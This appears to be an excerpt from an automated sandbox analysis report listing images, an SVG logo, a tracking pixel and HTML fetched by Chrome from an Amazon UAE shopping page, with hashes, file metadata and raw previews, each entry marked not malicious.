                                                                                                                                                                                                                                                                      MD5:47DD1387F6D2EDD32CBB1F89422E047E
                                                                                                                                                                                                                                                                      SHA1:29A93B5A157E4BA8CEFD7E93CE91DE3B065087F8
                                                                                                                                                                                                                                                                      SHA-256:FC3C28D21EC4CD155EF0CDA2B4BC0EE9C0354941303188EEFD222E6B3CA0C8D0
                                                                                                                                                                                                                                                                      SHA-512:8C9287D99E203454D29129236E83CB334856552BEAA47D5DD9ED8D221DB689BDAD672836238AECAF843A63D626F0C24FBF7412DEFB6953ABD6A7753FB772084E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoor-sports-Golf-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...............................................Mc.B..4.,.1.FN?&..=_.z.6..a."]...,.$.....[0C...r+i..O.p..K")2.36..H..H&fYF..!.l|^:K6......9...).m.Ti.f.X.......'....../....EH...K4..<. .=.."2.y....Q.|.f....V!B|.K.L...M.....^}+......Oc.q6=.,.y.."&....{/..Jy..<].~.......iiv...._....e..,.L..e...qz}Og...4..N..LA/v..W..)-e..0..1.=.....Os..?/.../2*.u.m.|mk....Ys.t....4W.....C....J.".f.E.]q..I.....O.}u.Q...jM...u.k.G.y....3.e.]u..=PKM..........r9....+7......Z.Yu.Mt..X....Eu.n.Ke.BUN\<..O[.s6Q..s98..Rn..i.....EKk#4.M4..q.'.......l./7.3E..[hUW..].l.*.&<.L..W.7...KW....\...7]ey.K...n....$e.&.T.y..z.....;.y.Z...N.z....DD...L.hh./e.c.....=...||..<......N....@..ai..U)G{,.j.Jj...].x.[O....?.....`=+I.D".Z.T..GC]..n..dU...^o,..XXHX..HEj......rf..o..4d....DLDDD$..bfH.aUEH...{..M..T.LD.. .ML.3.$....D...nw
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (14498)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):628679
                                                                                                                                                                                                                                                                      Entropy (8bit):5.529028439603334
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:9lfF1pVlMG4/AWB0GXGV/GnUEpUQQFCJQgvLtbRU8GFH:zFjAnnUR
                                                                                                                                                                                                                                                                      MD5:78B3F1DEC13F119DDCAD6FD484128641
                                                                                                                                                                                                                                                                      SHA1:EC958B53B98D6B429430C955C0703D6207D7A78B
                                                                                                                                                                                                                                                                      SHA-256:EBEE7BDD0555975E8BB9A74B9D254542262FE604A5376E2F90F65C7213029509
                                                                                                                                                                                                                                                                      SHA-512:696331F9DF8E4FF9E0309918A8CDC30A0DFDA5816E438AA96DC517E6F520B6A8251180A020B77552C4E0CF84167C4754EB3634EE67A54AC73C739DCE5AA1E3F0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/l/11601212031/?_encoding=UTF8&pd_rd_w=vdKJ7&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&pd_rd_wg=vThym&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&ref_=pd_hp_d_atf_unk
                                                                                                                                                                                                                                                                      Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5698
                                                                                                                                                                                                                                                                      Entropy (8bit):7.856708842923176
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:CGroGCus0j55MxIrJoHrCVQSSXC4PzE4SyOlEqI6v4AIotT2DAfJeXWnf:CGFC/01GwdQRrzSqy2DAhaWnf
                                                                                                                                                                                                                                                                      MD5:2D8135CBECD38CB855F71FDB3247D7A6
                                                                                                                                                                                                                                                                      SHA1:8ADDEC97F10DC4B952730DBC3B45342D0B4C21E3
                                                                                                                                                                                                                                                                      SHA-256:9CB0506CA1FE591A93C3BF7DDEC9D0FB8C0F57153146B0698E5056F46B9D6AC5
                                                                                                                                                                                                                                                                      SHA-512:AA27354CE045D623892C04F115B0B2952031540AC6732F54A247C0C004456559E7ECAE1BFE74C34743478ACB28E41922D318FC4148738B77399C73846629859D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9...................................................................... .y...\..t.?C2=L.+.H?...6...[....[.2.z..HS..5.....c..o8..^e.....m7.{..O.7........O.<..K.z.eG$.........w+..b~.....7|.......w..m..(..=.'m....ms-..?.....:....TV...c..._.).i.....`......:].*v:...k....gGP....m....>.C.>...CG...3.3...3.l...<.z...M....}%..v..sScI....^.H|.f......n]n.z.... '....l...<.z..^.T.:...w.;.\.Z..\fD.Q.5..I.8G..i...;:.|.y..\.............i....u3g..N........K(...j.H.........>.~.......................................!03.15..." 4@AP................-............................+RR}......*.r...L.kg2#)..Tw Er5r[.Z..}.0.jU.C.PZ...-......).W.2dB.....r..F|m.f0..>8.........K).%H.0....d....L.......J..a:1.%M<.5*2..p.h.f..:...e,....p5...I..P.[...Q.)F...n.a.......n.q.i.........v..yZ.q..L.....8.Y.a...\..&7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5251
                                                                                                                                                                                                                                                                      Entropy (8bit):4.007103797896673
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:ZwBG7haF0FNhMii6Tgmmy9pei44Y9yVXVq73hPpvbdwMGCQPFdMBRlF+2uC:mG7AF0xZTgtyYi4Skhxvbd1GoBPf
                                                                                                                                                                                                                                                                      MD5:A11C57EF107CE654FE3DFB306612D23F
                                                                                                                                                                                                                                                                      SHA1:24317BC338A8F88AD65C4247AA283DE02A3A36B1
                                                                                                                                                                                                                                                                      SHA-256:4245DF78CB042E5712946A0740D216DD2E923AD6889BCB2BD431F963608A7149
                                                                                                                                                                                                                                                                      SHA-512:8EF22FC98D68198B9C32F42941A5777CBA06219637EF70A8555570C1C7BB3FDD3BD394AEA3FD87D188A2270A267D8E98A79B696185FF3AB32065F62BCB932CA3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/perc/prime-logo.svg
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 53 15" shape-rendering="geometricPrecision"><path d="M11.933,4.04C11.933,3.896 11.966,3.794 12.027,3.738C12.089,3.681 12.187,3.652 12.323,3.652L13.441,3.652C13.679,3.652 13.825,3.767 13.876,3.994L13.985,4.398C14.296,4.097 14.671,3.859 15.112,3.683C15.552,3.507 16,3.419 16.456,3.419C17.46,3.419 18.256,3.787 18.841,4.523C19.427,5.257 19.72,6.253 19.72,7.506C19.72,8.366 19.575,9.117 19.284,9.759C18.995,10.402 18.601,10.896 18.103,11.243C17.606,11.591 17.036,11.764 16.394,11.764C15.968,11.764 15.565,11.697 15.181,11.562C14.798,11.427 14.472,11.241 14.202,11.003L14.202,14.406C14.202,14.55 14.173,14.652 14.118,14.708C14.06,14.765 13.959,14.794 13.814,14.794L12.323,14.794C12.187,14.794 12.089,14.765 12.027,14.708C11.966,14.652 11.933,14.55 11.933,14.406L11.933,4.04ZM48.66,8.345C48.069,8.345 47.557,8.289 47.122,8.174C47.184,8.869 47.393,9.365 47.751,9.666C48.108,9.967 48.649,10.117 49.375,10
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 288x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10573
                                                                                                                                                                                                                                                                      Entropy (8bit):7.927915920870356
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Df7HvXd9pXrpcyXEHKkpNEFuTJZfa/VVt8BilsubjSCuqnCQg:/pbgHKDuTJWVYilsuyK/g
                                                                                                                                                                                                                                                                      MD5:2A6446925FCABD172D6C2E4D18675D02
                                                                                                                                                                                                                                                                      SHA1:D4D713630F857A7D2B37EBD088673213DA209111
                                                                                                                                                                                                                                                                      SHA-256:2415A50BC09A6377D9440B504C7B8A1D02EC43F6B0CDC170F469EB362AC63318
                                                                                                                                                                                                                                                                      SHA-512:1DBD34F136922DAF6433CD8FFD0A85EBA45523090AFBD5A7F44683B0C20D1CE2F48F864F997CD4CAE5CBC8FEA2156877797545197C56B170A5C3AECF9D9A1BC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........ .."..........4....................................................................Q.= .%.^.ELc...=...OPL....vK.....!x.{.....%....A....Ke.L7~..N....8.H.FF.G.{..+.9.{..i....@(./...T.D.........w`..1.G...'....H...8...T.......)..ze6...:.......<..*... x......}i....y..z....5.5J..X..|..K..j...3.........*...u..5...<^..BK.+.........T|..x.\....h.r>C)"........6>...*wj...-;..}...qt.Y..ndv.(.1ie.?qZ.v....oNQ.9..)e.u.|.,?...;.q...@2>..j......./...... .<./.>sl..u.......e.(g.....u.qW.Wh..C..f.6.V.V..G.C.C......[#:.E/n......7....r....H....d.B....=.;.C....>{.V?wU.w..V:'.._.{i.<.`.Q..@U."9..V..5;.|...M.O...$...}...J.....c.`n...K...]..3c.e....NW...Wf...7...........fS.S.r.@.....'5K..........>..!l.Y.'v".l....g^..pY..kuW[.<|_i....W..?\..?].....s+i7..c........}..:...Ow.9O...|.IX+.U.f.S.....2.h
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30747
                                                                                                                                                                                                                                                                      Entropy (8bit):7.968248864222918
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:nBMi3mFzcW+z95T1PWQ8EN3GD4PTsMLKEFzUw7q:nii0cWCLWnEYktLKEFhq
                                                                                                                                                                                                                                                                      MD5:779C00F6DE13065181B5A42942031379
                                                                                                                                                                                                                                                                      SHA1:BEB377AB504D6BE082C98505C83A32971B936311
                                                                                                                                                                                                                                                                      SHA-256:181CC02786D7F7514F72A5244C48A86B6DB526FFAC2B13C41D1D5620F281A55D
                                                                                                                                                                                                                                                                      SHA-512:EF0C1E56B3500032C1424E7DF865F0B98A5C009BB4A3D3BD353536C474B0BF661A47B4A3E5DA1FAD9944175533AF15FDC50DB0E21F8C0774B9912B71F3270501
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81OdMnlnPlL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5..................................................................z.E._.....`n.K.Z....Nq$..I$.I%[..,.Vz...U4.=\..b...9....:.I$.I$.I$.}.\...;..'....1.l.gU...P.@.".sK>..v....RX...fy..8..n.B....mf...j........>c....Q%...:..9Z?..\..Af.."....E|-&..Y.....^......Y}.PF-:......8;..v.C...9.{t.m_..3.3x|..-.cR......p.^.f.C...........!..)..K..m.F...!._@...../..!...;=5..SA.|4...(....u.V.C..dQ....^-....=..k..Qj.!.U..I..q\..cX..\.....c......f.v..."....=..Y..H....W9j\3x...#...))'s...........d.\...d..'...\p..35."..P...^c.43..%..x.%.9}..Xe.....j.h....6.r.ro@f..-I..{,".K.5..,.ZN$.I$..%5e.t.Q+..d.......y`.l..jz.3.{.w.!k.V.Mq. ..'...z.C..e..<4.Qt..O..yn..*...,I....l.`..g..$.$...t.._.........H..w..w)...*...E...G.@..="....%.n.J.x....%..5T...j.H.~..Q..2...q........|.|e.{......]......o8.}...[C.4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4405
                                                                                                                                                                                                                                                                      Entropy (8bit):7.778404097758394
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T0fmezCpK1fzxjPFzFeEQnhu7SDHvwzuwmSUfGBZxGT:qep27FPFzFeEchfWmn
                                                                                                                                                                                                                                                                      MD5:602453D6A1F37C8B2206C5D2248F00B7
                                                                                                                                                                                                                                                                      SHA1:2F3513F1886A38CB57C0A0A2A7D171AD68B7DC19
                                                                                                                                                                                                                                                                      SHA-256:FF937553832CD1765784934627764B1447A3D8B0411834F98694320C0CA683AB
                                                                                                                                                                                                                                                                      SHA-512:1F4200762D8DEA6CEE821C6E3A732F3E3E5C4D60B35DC622A0AAD98BFFBF9734AC1DBFEA9AF4CDE108C29AB2BC4815AB1DE164E61F0F102141BC9A77B5429E63
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/317JiGToz-L._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...............................................................................(....be.^.&%.!.s.3....q1.P../..<[C...A ....EJ....1......2.;cSl.m.Z.lT.-)Sp.....y....2...7..a ....2.q:#.....\y...ej.....{.}.^..aZ.;..%.....`......&....E.D..|..4.}..uF]Ue...j.X...|..ix...,N..N.+.9..{9.(.....-.._..}..$..Sz9ox.S.s;;._e..nq\.*..K+.....+..#i..b....6J6&.O.^.NX...).\.x~....{..1..dUl..kuy.Y.<..Wu.. ...#$."n.........oWqcZ..*..L....3....R..z.......Cf ...#$.bj......v....,.........s^.FN._'.].t..t.4t..Hl.....l.lM@.9.#.2.?m..".Yi.^J[m......{.v.r.........6.....2N2&..>.~..........i..R4..m.].....F+......6......R&&..........YFU..T..:.....m.Jg....6i...-.}5Pg......E..A].\{+....K^6......o+. ................2............................ 013A.!245."B#$Q`%Rq............Q.y'.....H...W....>.^.x...*.v..n.6....ccOTA..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D51718%26pc0%3D51718%26ld0%3D51718%26t0%3D1724264970912%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:51717
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):144274
                                                                                                                                                                                                                                                                      Entropy (8bit):7.735030497100166
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:4HuLo+k6ONuRKXRMVvo95/L7yaZJWdKb/ivUJF6Pw41DNp6FCoC:EuLo+k6VqavU5T7y4n/NjcwY6Fe
                                                                                                                                                                                                                                                                      MD5:82A69B829D3E935D11D849075F6C39A9
                                                                                                                                                                                                                                                                      SHA1:FCBDE75E4547C6A72B7EFDEFF104314CA2149259
                                                                                                                                                                                                                                                                      SHA-256:7EE6B7453552B8CBB749E172224344DF1FF248EAA7146C8AC99B89AF624BA62D
                                                                                                                                                                                                                                                                      SHA-512:9270B5CB3FE40154458A965EB37F5EBAFC96E200F1D7FFF1BF6067DC29D191844A2105E0B0758946C67A176B23A339839B0B7FFE150BBA8023EAF546B9D4D6B7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71+TeUnEtaL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 201x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):19273
                                                                                                                                                                                                                                                                      Entropy (8bit):7.973432536286121
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/KDlPG6oK2zvug88gdm+gsMrucQ2BoLlynZ4MRaHoUs5YQZYa:/KDlPJ2zvKPXrF2oaKrH0YQZP
                                                                                                                                                                                                                                                                      MD5:2230E766B61CF1B0FEEA38690E37FEEA
                                                                                                                                                                                                                                                                      SHA1:65EE979142D99FFF02DFE5E95281C22399435885
                                                                                                                                                                                                                                                                      SHA-256:C09232A9BC8AA4E63794CE1F7D3DDB2D0C17013AFEAD1F3AC5A180407E38A0B0
                                                                                                                                                                                                                                                                      SHA-512:59DAFAE41BDB6E230FC6C03B92F6A7D0D2C56010EF260D5ABC7BA55A91F9E75F08561AD6FACE5AF18896B6B6EE2027344C05833A917FA6141FB3BAE582774969
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81cHqnyvDAL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..............................................................!..1A"Q.2aq...#B....3Rb..4Srs...$5Ct....Dc..%T.....................................................!1A.."2Qaq.#B.........R..3c............?.........z..c...W.1.~._.8.W..t&h..OI..5.$.....7.('..cm.!21.0..F$*.q....TF.]G.c..._....5.1.N...~......4.;sT{.#...m..F....E.!.....au-H].Z..7a....5...C..s.......78....0]...OB1..NJ..>.Ex.m.]...w...\|1 ...t'.`.N>.t..T.............0].....~.D..1..#..'S..#.bqcM....K...h"...9.c......N.r3(..Z...Z.....:.T...N..}......1..J.Ep&Z........N-3...c...8.*.p{.B.h.....nv.1.'.'..`B....1:c.o...{cr...=.|..:W..).b.......bUUrS.df..7....!.bz.X.m.........nv.c..`_P.m.6......\.$...@...d-.Q.......${.....UeEP}.H_.w...w..(+.....~..d)R.....GJ].0...>K^.bAP=....Ty.J.srv..^......:...0.BIp>6.r...!..v.t/EI...JT..X..a.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3157
                                                                                                                                                                                                                                                                      Entropy (8bit):7.875151339724645
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rmtUzK7eeI6ahxS5ZCe1elrPbc9Gpzme4eS1HFiPnKB+XZrpzTnLpD+Np0MAQ:TDUz/4CieR1girNT1DGmMA11Rm
                                                                                                                                                                                                                                                                      MD5:8A8F97EE467B7450693CF229FE06C7A9
                                                                                                                                                                                                                                                                      SHA1:DA7E40F0F24141E573095072F2CC778901DFF45D
                                                                                                                                                                                                                                                                      SHA-256:E23AB0277A10A719139E16D976900C795F80AB34BE28F632F6530099E821E277
                                                                                                                                                                                                                                                                      SHA-512:119505C239A8645AEC99590210FC7A296B8C1B9F889C80658EA5BDCA8F5DD0186D6DE44F9677E7C658B0979B91ED4C6603A4B10EF28D1E9865499320CAF4CBF6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A.Qaq...."2..Rr.....$3s....BS#%CTbc................................................1...!A."2..............?...*.I..........Ts.=.C...i.n....h...{y.#..5\.1.,....4M.w.....e.....i...Gq./`.....5.P...4....H>".kwN*G..`..........A....f...5..`...5.....J.J..n(.t.;...o.S.F>y...7..k.G.@P6.Q.._.H...l|4..C}...}.j....%.G.....'..O...[c..zD....B.frOge..y...."f(.A..j./.......s.wTe..j.j..UdmjY..+..(..m.7.N......M...QOi.......<dw.G..4{..b..!e..G....g..}...#..{q".3.T..W..8....Gq_.(.H.S.=..N .G...e.....QKk..GQ..8i:.#l6.XZk....SB,0......x...O....M.........G.e.._z....\....j.G..../b....>Y.\M.......~t.........3TY..|y"TZ..A.a....{)..%....^.....t..I......C|R.=..n'=...d<Px.?1Ze1.*y......iP....H[Z..u....?..Iv..'7.4.m....V...].v.S....2.. .=..Uc..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 91x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3430
                                                                                                                                                                                                                                                                      Entropy (8bit):7.931181702362248
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:8zKRIga0QJWzRsngQ1B1JKa+3mGEi+cQ7vxtObD7YTWY/:KKIga038g2Bmj0co3mYTWY
                                                                                                                                                                                                                                                                      MD5:7BD6FA6477B8454187FAD21616D7A49E
                                                                                                                                                                                                                                                                      SHA1:33BDD312A672D06E77308041B180BC722398B5D5
                                                                                                                                                                                                                                                                      SHA-256:352B9AAE4465FF482F851DDF1D18AAD7487306E0FCAAF4A4A23510D905DC2B94
                                                                                                                                                                                                                                                                      SHA-512:8D71D9DE7041CF10E6A841CC008D9B56C3282FD9CA6A83E3AEC92F8CC33A78F4F0558F752C516B22BEE5EA3DEB737D9BB661A07139ECF0FF53B5092888A04FCD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:RIFF^...WEBPVP8 R....6...*[.Z.>...A..j...8.0..]W......c.yV.).c.5.....o..........p..i.;......O.M.......,.....=y.............d...I.O......>N./........!.....w.g.ng...'....\..~.zN.O.............).#...'.o....b?.|u...;.......~y.K.Y.....7.........)...w....b..fia.h...c6rt.6..........~.F.s....x.H.g.0..n6B.$......*.V."....1.....fG..!/.{.....gp.p....8...8.B...2...N....{.G.....}s..t..!.&_...z.."....V......R...-.^{$..?.r...n.......5....P.z.C..:x........-...A"...!..1^.hs!w.......p|.?..L...Ua..........f....2Tql...+.m.B.iT..C...^.o.cnT.z...mP..b\.5D.|...".>?.~...).y......R.K........C........J.s.p...{......e..[.....i....=]iO.F....{.._..^C.......I$...O.h...Z..S.x..]...../......(g..%..lP..NA.B.hGN`q....e.{..CS....n.(....@G.b...9.m.....0b..I.(}...B....?....Tm...xW..."M.(E.......+..~1....cA6.3..T.*N..........n......a...I..p.@..Y.K...].;....S.ch.....i[....:$.bv|.(...p....t.=.;.J...g}......i,.o..C.2".!_ iJ......H..9........R.X...k.(G.X.-..vE./.O*.>.....\..i...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 207x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8590
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946247791594697
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:QyJbJBj/cfgB+35ltDGIe+jlzKmYAIUHRUTgdN4TTE3moaYvYIhG:3bj/cfgcT1he+jUmYAiTgdNUE2LYwIhG
                                                                                                                                                                                                                                                                      MD5:F832B2305F9F78038CB08623B334A53D
                                                                                                                                                                                                                                                                      SHA1:85556AA4C3FCE3403C747467195A2CA1A013DA8D
                                                                                                                                                                                                                                                                      SHA-256:644A30E692D729B374E40A2464FB3976E0BD2D049DAA7005E98E3CDB14C97D8E
                                                                                                                                                                                                                                                                      SHA-512:93633FB1E672B9259D435A917B93135DB79DE2B546F43E687736ED183A85723E98683B40C3CD96F8E742CE997A5EF32EB025D92CF63409D227B21E41AFE1B4A4
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/617Bf2FnoqL._AC_SY200_.jpg
